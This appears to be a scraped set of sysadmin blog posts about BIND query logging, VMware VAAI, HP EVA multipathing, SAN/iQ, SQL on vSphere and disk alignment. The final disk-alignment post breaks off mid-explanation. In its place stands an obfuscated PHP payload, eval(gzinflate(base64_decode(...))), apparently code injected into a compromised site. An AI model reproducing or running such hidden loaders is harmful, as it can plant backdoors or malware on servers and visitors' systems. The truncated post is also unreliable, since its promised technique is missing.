Turn on BIND server logging to see queries

Q. How do I turn on DNS server logging so that I can see all the queries on my Fedora 14 server?

A. You can use the rndc command which controls the operation of a name server. It supersedes the ndc utility that was provided in old BIND releases. If rndc is invoked with no command line options or arguments, it prints a short summary of the supported commands and the available options and their arguments.

rndc communicates with the name server over a TCP connection, sending commands authenticated with digital signatures.

Task: Turn no logging

Type the following command as root to toggle query logging:
# rndc querylog

Task: View bind server query log

Once this is done, you can view all logged queries using /var/log/messages file. To view those queries, type:
# tail -f /var/log/messages

Task: Turn off logging

Type the following command as root to toggle query logging:
# rndc querylog

How do I know if VAAI is enabled on ESX/ESXi?

To determine if VAAI is enabled within ESX/ESXi:

  • In the vSphere Client inventory panel, select the host.
  • Click the Configuration tab, and click Advanced Settings under Software.
  • Check that these options are set to 1 (enabled):
DataMover/HardwareAcceleratedMove
DataMover/HardwareAcceleratedInit

VMFS3/HardwareAcceleratedLocking

Note: These options are enabled by default.

To determine if VAAI is enabled service console in ESX or the RCLI in ESXi, run the following commands and ensure that the value is 1:

# esxcfg-advcfg -g /DataMover/HardwareAcceleratedMove
# esxcfg-advcfg -g /DataMover/HardwareAcceleratedInit
# esxcfg-advcfg -g /VMFS3/HardwareAcceleratedLocking

Can I check the VAAI status from the command line?
To check VAAI status, run the command:

# esxcfg-scsidevs -l | egrep “Display Name:|VAAI Status:”

EVAPERF “Access to the host was NOT verified

Sometimes I get the “nice” message from EVAperf, when adding a new CV/EVA host to the access list:

c:\Program Files\Hewlett-Packerd\EVA Performance Monitor>evaperf fnh 127.0.0.1 <username>
Access to the host was NOT verified
Host: 127.0.0.1 not added to the list

This also goes when changing 127.0.0.1 to localhost or the IP address of the host.

Turns out that the fqn of the host fixes this issue.

EVA VAAI compliant?

Question that are thrown to me are:

Is the EVA VAAI compliant?
The EVA will be “vStorage APIs for Array Integration” (in short VAAI) compliant. It is NOT compliant at the moment.

Will it be in the next firmware release. Probably NOT.

The next… Probably YES. So we will have to wait, but until then the EVA should be fast enough by it’s own.

More information when available.

Quick install applications

Also getting tiered of over and over installing applications that you need of want in new installations (like Google Chrome, Java, etc…)

Take a look at http://ninite.com

Select the applications from the list you want to install. You will get a downloadable executable, that will fully automatically install the chosen apps. Versions you already installed by hand will be skipped.

A “Poor man’s SAN” for ESX vSphere with VSA

Just thinking on how to make a “Poor man’s SAN” I came across this this idear:

Take 2 servers with enough disk space available and the ability to expand when needed. Install on both systems ESXi vSphere. With this installed, create on your ESX hosts VM’s with the VSA you can buy from HP.
The VSA is the same software that is running on the P4000 from HP, but now running inside your vSphere environment. The licenses go up to 10TB.
Doing so on both ESX hosts you can setup you SAN/iQ management environment and also your (first) cluster.

Make sure you have enough managers running to keep your data available in case one of your ESX hosts dies.

Now you have created your own iSCSI “P4000” like SAN. You can now connect to it from your production ESX vSphere environment.

One thing. Support from HP is NOT included.
(drawing will follow)

Best practices for HP EVA, vSphere 4 and Round Robin multi-pathing

The VMware vSphere and the HP EVA 4×00, 6×00 and 8×00 series are ALUA compliant. ALUA compliant means in simple words that it is not needed to manually identify preferred I/O paths between VMware ESX hosts and the storage controllers.

When you create a new Vdisk on the HP EVA the LUN is set default set to No Preference. The No Preference policy means the following:

– Controller ownership is non-deterministic. The unit ownership is alternated between controllers during initial presentation or when controllers are restarted
– On controller failover (owning controller fails), the units are owned by the surviving controller
– On controller failback (previous owning controller returns), the units remain on the surviving controller. No failback occurs unless explicitly triggered.

To get a good distribution between the controllers, the following VDisk policies can be used:

Path A-Failover/failback
– At presentation, the units are brought online to controller A
– On controller failover, the units are owned by the surviving controller B
– On controller failback, the units are brought online on controller A implicitly

Path B-Failover/failback
– At presentation, the units are brought online to controller B
– On controller failover, the units are owned by surviving controller A
– On controller failback, the units are brought online on controller B implicitly

In VMware vSphere the Most Recently Used (MRU) and Round Robin (RR) multi-pathing policies are ALUA compliant. Round Robin load balancing is now officially supported. These multi-path policies have the following characteristics:

MRU:
– Will give preference to an optimal path to the LUN
– When all optimal paths are unavailable, it will use a non-optimal path
– When an optimal path becomes available, it will failover to the optimal
– Although each ESX server may use a different port through the optimal controller to the LUN, only a single controller port is used for LUN access per ESX server

Round Robin:
– Will queue I/O to LUNs on all ports of the owning controllers in a round robin fashion providing instant bandwidth improvement
– Will continue queuing I/O in a round robin fashion to optimal controller ports until none are available and will failover to the non-optimal paths
– Once an optimal path returns it will failback to it
– Can be configured to round robin I/O to all controller ports for a LUN by ignoring optimal path preference. (May be suitable for a write intensive environment due to increased controller port bandwidth)

The fixed multi-path policy is not ALUA compliant and therefore not recommend to use.

Another (HP) Best Practice is to set the IOPS (Default the IOPS value is 1000) to a value of 1 for every LUN by using the following command:

for i in `ls /vmfs/devices/disks/ | grep naa.600` ;
do esxcli nmp roundrobin setconfig –type “iops” –iops=1 –device $i ;done

There is a bug when rebooting the VMware ESX server, the IOPS value reverted to a random value.
To check the IOPS values on all LUNs use the following command:

for i in `ls /vmfs/devices/disks/ | grep naa.600` ;
do esxcli nmp roundrobin getconfig –device $i ;done

To solve this IOPS bug, edit the /etc/rc.local file on every VMware ESX host and and add the IOPS=1 command. The rc.local file execute after all init scripts are executed.

The reason for the IOPS=1 recommendation is because during lab tests within HP this setting showed a nice even distribution of IOs through all EVA ports used. If you experiment with this you can see the queue depth for all EVA ports used very much even and also throughput through the various ports. Additionally with the workloads there is a noticeable better overall performance with this setting.

Best practices are not a “one recommendation fits all” cases.

VAAI support with SAN/iQ 9.0 on P4000

SAN/iQ vor P4000 has now support fot VMware VAAI vStorage offloads — Full copy, Block Zeroing, and Hardware Assisted Locking for faster VM deployment and less load on ESX server.

Meaning more VM’s can be run on the same environment. Till SAN/iQ 8.1 is was recommended to a total of 16 VM’s, now up t 50 VM’s should be supported. I have not been able to test this theorie, but this is stated by HP at this moment.

To upgrade to SAN/iQ 9.0 your system should run SAN/iQ 8.1.

SQL on vSphere link collection

VMware released some whitepapers about running MS SQL Server on VMware vSphere.

The VMware communities site has a spot called VIOPS where you can see posts from members in the community about recently posted documents. There are some nice documents available about virtualizing SQL server 2008 on vSphere 4.1.

There are a couple on SQL Server, for each product a “best practices document” and an “availability and recovery options” document.

Microsoft SQL Server on VMware – Best Practices Guide

Microsoft SQL Server on VMware – Availability and Recovery Options

Performance and Scalability of Microsoft® SQL Server® on VMware vSphere™ 4

Design, Deploy & Optimize SQL Server on vSphere

Disk alignment

Disk alignment is very important in every Operating system environment. But when you are using a SAN and also using VMware you should take disk alignement in account.

Above you see that the Guest OS (for example Windows) is not aligned with the VMFS and the VMFS is not aligned with the Array Blocks. Meaning that 1 I/O can result into 3 I/O’s on the storage device.

Now the VMFS has been aligned, but the Guest OS is still not. Now an I/O can result into 2 I/O’s on the storage device. Beter, but performance can still be improved.

Now all File Systems are aligned. On I/O results into 1 I/O, because all beginning of the blocks are at the same position.

Only Windows Vista, Windows 2008 and Windows XP has a trick to avoid this:

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>